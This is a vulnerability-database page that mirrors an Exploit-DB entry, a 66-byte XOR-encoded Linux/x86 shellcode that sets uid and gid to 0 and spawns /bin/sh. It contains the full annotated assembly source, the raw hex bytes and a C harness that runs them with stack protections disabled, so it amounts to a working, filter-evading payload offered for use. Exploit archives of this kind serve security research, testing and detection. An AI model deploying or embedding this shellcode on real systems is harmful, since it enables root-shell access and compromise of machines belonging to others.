Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux/x86 - XOR encoded execve(/bin/sh) setuid(0) setgid(0) Shellcode (66 bytes)

🗓️ 15 Jun 2017 00:00:00Reported by Exploit-DBType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 34 Views

Linux/x86 - 66 byte - XOR encoded execve(/bin/sh) - setuid(0) - setgid(0) Shellcod

Code
;Title: Linux/x86 - 66 byte - execve(/bin/sh) - setuid(0) - setgid(0) - XOR encrypted
;Author: nullparasite
;Contact: [email protected]
;Category: Shellcode
;Architecture: Linux x86
;Description: This shellcode, first set uid and gid to zero then call shell using execve. Also, /bin/sh defined as a XOR encrypted.
;Tested on: Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux

====================================================================

global _start

section .text

_start:
jmp entrypoint ; jump immd.

prepare:
pop esi ; address of string -> esi
xor eax, eax ; clear eax
xor ecx, ecx ; ecx
mov BYTE [esi+7], al ; terminate string, str[7] = NULL
lea ebx, [esi] ; put address of string -> ebx
mov DWORD [esi + 8], ebx ; replace first 4-# with string
mov DWORD [esi + 12], eax ; replace last 4-# with NULL

mov BYTE cl, 7 ; set counter to 7

decode:
xor BYTE [esi + ecx - 1], 0x3 ; s[cl-1] = s[cl-1] ^ 3
sub cl, 1 ; dec count by 1
jnz decode ; jump if not zero

priv_setuid:
xor ebx, ebx ; clear ebx, setuid(0)
mov al, 0x17 ; setuid = 0x17
int 0x80 ; trap

priv_setgid:
xor ebx, ebx ; clear ebx, setgid(0)
mov al, 0x2e ; setgid = 0x2e
int 0x80 ; trap

shell:
mov BYTE al, 0x0b ; execve = 0x0b
mov ebx, esi ; arg1, /bin/sh
lea ecx, [esi + 8] ; arg2, p[0] = /bin/sh, p[1] = NULL
lea edx, [esi + 12] ; arg3, pointer to NULL

int 0x80 ; trap

entrypoint:
call prepare ; call prepare
db ',ajm,pk#########' ; store string on the stack

====================================================================

# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing

#include<stdio.h>

unsigned char code[] = "\xeb\x34\x5e\x31\xc0\x31\xc9\x88\x46\x07\x8d"
"\x1e\x89\x5e\x08\x89\x46\x0c\xb1\x07\x80\x74"
"\x0e\xff\x03\x80\xe9\x01\x75\xf6\x31\xdb\xb0"
"\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8"
"\xc7\xff\xff\xff\x2c\x61\x6a\x6d\x2c\x70\x6b";

typedef int(*shellcode_t)();

int main(){
shellcode_t ret = (shellcode_t)code;
ret();
}

====================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Jun 2017 00:00Current
0.3Low risk
Vulners AI Score0.3
linux x86shellcodexor encryptedexecvesetuid(0)setgid(0)nullpriv_setuidpriv_setgidentrypointpreparedecodeshell
34